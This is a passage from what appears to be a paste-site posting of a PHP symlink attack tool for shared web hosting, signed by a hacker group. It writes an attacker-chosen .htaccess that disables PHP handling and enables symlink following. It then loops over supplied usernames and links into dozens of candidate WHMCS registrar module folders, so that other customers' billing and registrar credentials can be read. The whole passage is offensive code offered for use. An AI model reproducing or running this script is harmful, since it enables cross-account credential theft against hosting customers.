- Satisfy Any">Apache</option>
- <option title="Litespeed" value="
- Options +FollowSymLinks
- DirectoryIndex seees.html
- RemoveHandler .php
- AddType application/octet-stream .php ">Litespeed</option>
- </select> <input style="color:red;background-color:#000000" name="anu" size="10"
- value="<< START SCAN >>" type="submit">
- <br/><br/></form></center>
- <?php
- @ini_set('html_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @ini_set('file_uploads',1);
- if ($_POST['anu']) {
- $path = $_POST['path'];
- $home = $_POST['home'];
- $functions=@ini_get("disable_functions");
- if(eregi("symlink",$functions))
- {
- die ('Kurang Ganteng Cok');
- }
- @mkdir(WHMCS, 0755);
- @chdir(WHMCS);
- $htaccess=$_POST['soft'];
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]);
- foreach($passwd as $pwd){
- $user=trim($pwd);
- @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER');
- @symlink('/'.$home.'/'.$user.'/public_html/modules/registrars/',$user.' <~ WHMCS-1'); @symlink('/'.$home.'/'.$user.'/public_html/account/modules/registrars/',$user.' <~ WHMCS-2');
- @symlink('/'.$home.'/'.$user.'/public_html/accounts/modules/registrars/',$user.' <~ WHMCS-3');
- @symlink('/'.$home.'/'.$user.'/public_html/central/modules/registrars/',$user.' <~ WHMCS-4');
- @symlink('/'.$home.'/'.$user.'/public_html/clienti/modules/registrars/',$user.' <~ WHMCS-5');
- @symlink('/'.$home.'/'.$user.'/public_html/client/modules/registrars/',$user.' <~ WHMCS-6');
- @symlink('/'.$home.'/'.$user.'/public_html/cliente/modules/registrars/',$user.' <~ WHMCS-7');
- @symlink('/'.$home.'/'.$user.'/public_html/clientes/modules/registrars/',$user.' <~ WHMCS-8');
- @symlink('/'.$home.'/'.$user.'/public_html/clients/modules/registrars/',$user.' <~ WHMCS-9');
- @symlink('/'.$home.'/'.$user.'/public_html/clientarea/modules/registrars/',$user.' <~ WHMCS-9');
- @symlink('/'.$home.'/'.$user.'/public_html/clientsarea/modules/registrars/',$user.' <~ WHMCS-10');
- @symlink('/'.$home.'/'.$user.'/public_html/client-area/modules/registrars/',$user.' <~ WHMCS-11');
- @symlink('/'.$home.'/'.$user.'/public_html/clients-area/modules/registrars/',$user.' <~ WHMCS-12');
- @symlink('/'.$home.'/'.$user.'/public_html/clientzone/modules/registrars/',$user.' <~ WHMCS-13');
- @symlink('/'.$home.'/'.$user.'/public_html/client-zone/modules/registrars/',$user.' <~ WHMCS-14');
- @symlink('/'.$home.'/'.$user.'/public_html/core/modules/registrars/',$user.' <~ WHMCS-15');
- @symlink('/'.$home.'/'.$user.'/public_html/company/modules/registrars/',$user.' <~ WHMCS-16');
- @symlink('/'.$home.'/'.$user.'/public_html/customer/modules/registrars/',$user.' <~ WHMCS-17');
- @symlink('/'.$home.'/'.$user.'/public_html/customers/modules/registrars/',$user.' <~ WHMCS-18');
- @symlink('/'.$home.'/'.$user.'/public_html/bill/modules/registrars/',$user.' <~ WHMCS-19');
- @symlink('/'.$home.'/'.$user.'/public_html/billing/modules/registrars/',$user.' <~ WHMCS-20');
- @symlink('/'.$home.'/'.$user.'/public_html/finance/modules/registrars/',$user.' <~ WHMCS-21');
- @symlink('/'.$home.'/'.$user.'/public_html/financeiro/modules/registrars/',$user.' <~ WHMCS-22');
- @symlink('/'.$home.'/'.$user.'/public_html/host/modules/registrars/',$user.' <~ WHMCS-23');
- @symlink('/'.$home.'/'.$user.'/public_html/hosts/modules/registrars/',$user.' <~ WHMCS-24');
- @symlink('/'.$home.'/'.$user.'/public_html/hosting/modules/registrars/',$user.' <~ WHMCS-25');
- @symlink('/'.$home.'/'.$user.'/public_html/hostings/modules/registrars/',$user.' <~ WHMCS'-26);
- @symlink('/'.$home.'/'.$user.'/public_html/klien/modules/registrars/',$user.' <~ WHMCS-27');
- @symlink('/'.$home.'/'.$user.'/public_html/manage/modules/registrars/',$user.' <~ WHMCS-28');
- @symlink('/'.$home.'/'.$user.'/public_html/manager/modules/registrars/',$user.' <~ WHMCS-29');
- @symlink('/'.$home.'/'.$user.'/public_html/member/modules/registrars/',$user.' <~ WHMCS-30');
- @symlink('/'.$home.'/'.$user.'/public_html/members/modules/registrars/',$user.' <~ WHMCS-31');
- @symlink('/'.$home.'/'.$user.'/public_html/my/modules/registrars/',$user.' <~ WHMCS-32');
- @symlink('/'.$home.'/'.$user.'/public_html/myaccount/modules/registrars/',$user.' <~ WHMCS-33');
- @symlink('/'.$home.'/'.$user.'/public_html/my-account/client/modules/registrars/',$user.' <~ WHMCS-34');
- @symlink('/'.$home.'/'.$user.'/public_html/myaccounts/modules/registrars/',$user.' <~ WHMCS-35');
- @symlink('/'.$home.'/'.$user.'/public_html/my-accounts/modules/registrars/',$user.' <~ WHMCS-36');
- @symlink('/'.$home.'/'.$user.'/public_html/order/modules/registrars/',$user.' <~ WHMCS-37');
- @symlink('/'.$home.'/'.$user.'/public_html/orders/modules/registrars/',$user.' <~ WHMCS-38');
- @symlink('/'.$home.'/'.$user.'/public_html/painel/modules/registrars/',$user.' <~ WHMCS-39');
- @symlink('/'.$home.'/'.$user.'/public_html/panel/modules/registrars/',$user.' <~ WHMCS-40');
- @symlink('/'.$home.'/'.$user.'/public_html/panels/modules/registrars/',$user.' <~ WHMCS-41');
- @symlink('/'.$home.'/'.$user.'/public_html/portal/modules/registrars/',$user.' <~ WHMCS-42');
- @symlink('/'.$home.'/'.$user.'/public_html/portals/modules/registrars/',$user.' <~ WHMCS-43');
- @symlink('/'.$home.'/'.$user.'/public_html/secure/modules/registrars/',$user.' <~ WHMCS-44');
- @symlink('/'.$home.'/'.$user.'/public_html/support/modules/registrars/',$user.' <~ WHMCS-45');
- @symlink('/'.$home.'/'.$user.'/public_html/supporte/modules/registrars/',$user.' <~ WHMCS-46');
- @symlink('/'.$home.'/'.$user.'/public_html/supports/modules/registrars/',$user.' <~ WHMCS-47');
- @symlink('/'.$home.'/'.$user.'/public_html/web/modules/registrars/',$user.' <~ WHMCS-48');
- @symlink('/'.$home.'/'.$user.'/public_html/webhost/modules/registrars/',$user.' <~ WHMCS-49');
- @symlink('/'.$home.'/'.$user.'/public_html/webhosting/modules/registrars/',$user.' <~ WHMCS-50');
- @symlink('/'.$home.'/'.$user.'/public_html/whm/modules/registrars/',$user.' <~ WHMCS-51');
- @symlink('/'.$home.'/'.$user.'/public_html/whmcs/modules/registrars/',$user.' <~ WHMCS-52');
- @symlink('/'.$home.'/'.$user.'/public_html/whmcs2/modules/registrars/',$user.' <~ WHMCS-53');
- @symlink('/'.$home.'/'.$user.'/public_html/Whm/modules/registrars/',$user.' <~ WHMCS-54');
- @symlink('/'.$home.'/'.$user.'/public_html/Whmcs/modules/registrars/',$user.' <~ WHMCS-55');
- @symlink('/'.$home.'/'.$user.'/public_html/WHM/modules/registrars/',$user.' <~ WHMCS-56');
- @symlink('/'.$home.'/'.$user.'/public_html/WHMCS/modules/registrars/',$user.' <~ WHMCS-57');
- }
- echo '<hr color="#00bfff"><center>
- <font face="Audiowide" size="5" style="color:#00bfff;background-color:#000000">
- <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
- Scanning Complete....<br/>
- Now Checking Folder Result....<br/><br/><br/>
- <a href="/WHMCS">O=[ GO TO HELL ]=O</a>
- </font>
- <br/><br/><br/></center> </body></html> ';
- }
- }
- echo'<br><br>
- <div style="background:blue;margin:0px;padding:8px;text-align:center;color:black;">
- <font color=silver>© </font><b><i>AZZATSSINS CYBERSERKERS</i></b>
- </div>';
- ?>
Add Comment
Please, Sign In to add comment